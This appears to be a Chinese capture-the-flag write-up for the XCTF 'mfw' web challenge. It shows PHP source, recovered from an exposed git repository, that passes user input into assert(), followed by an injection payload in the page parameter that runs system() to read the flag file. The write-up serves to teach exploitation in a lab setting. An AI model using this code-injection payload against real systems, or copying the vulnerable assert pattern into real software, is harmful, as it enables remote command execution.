XCTF-web-mfw

发现了git

使用GitHack下载一下源文件,找到了php源代码

csharp 复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

解析

csharp 复制代码
<?php
// 获取GET参数中的page值,如果不存在则默认为"home"
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}

// 拼接文件路径,将page值作为文件名
$file = "templates/" . $page . ".php";

// 安全检查:确保路径中不包含".."(目录遍历攻击防护)
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// 安全检查:确保文件存在
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

解题:

?page=').system("cat templates/flag.php");//

')进行闭合

system("cat templates/flag.php")表示在系统中执行cat templates/flag.php命令,该命令用于查看templates目录下的flag.php文件内容

在源码中可以看到flag

相关推荐
2501_916007473 小时前
Fiddler抓包工具实战指南:结合Charles、Postman优化Web与移动调试流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
刘俊辉个人博客5 小时前
端口安全配置示例
运维·网络·数据库·计算机网络·安全·网络安全
00后程序员张6 小时前
上线iOSApp前抓包工具协作保障接口行为一致性(iOS抓包)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
炎码工坊7 小时前
容器运行时保护:用Falco构建云原生安全防线
网络安全·微服务·云原生·系统安全·安全架构
liulilittle12 小时前
主流防火墙策略绕过漏洞的修复方案与加固实践
网络·安全·网络安全·信息与通信·ip·通信
网络安全工程师老王13 小时前
DOM型XSS深度渗透实战
网络安全·渗透测试·xss
IT小馋猫14 小时前
从源码到生产:Apache 2.4.57 自动化安装实战指南(附脚本)
linux·服务器·网络·网络安全
网络安全小吗喽17 小时前
靶场(二十五)---小白心得&&靶场体会---Access
服务器·windows·测试工具·网络安全·靶机
2501_916008891 天前
iOS端网页调试 debug proxy策略:项目中的工具协同实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Haicaji1 天前
伪造GPS信号多种方式尝试-HackRF
网络安全·gps·hackrf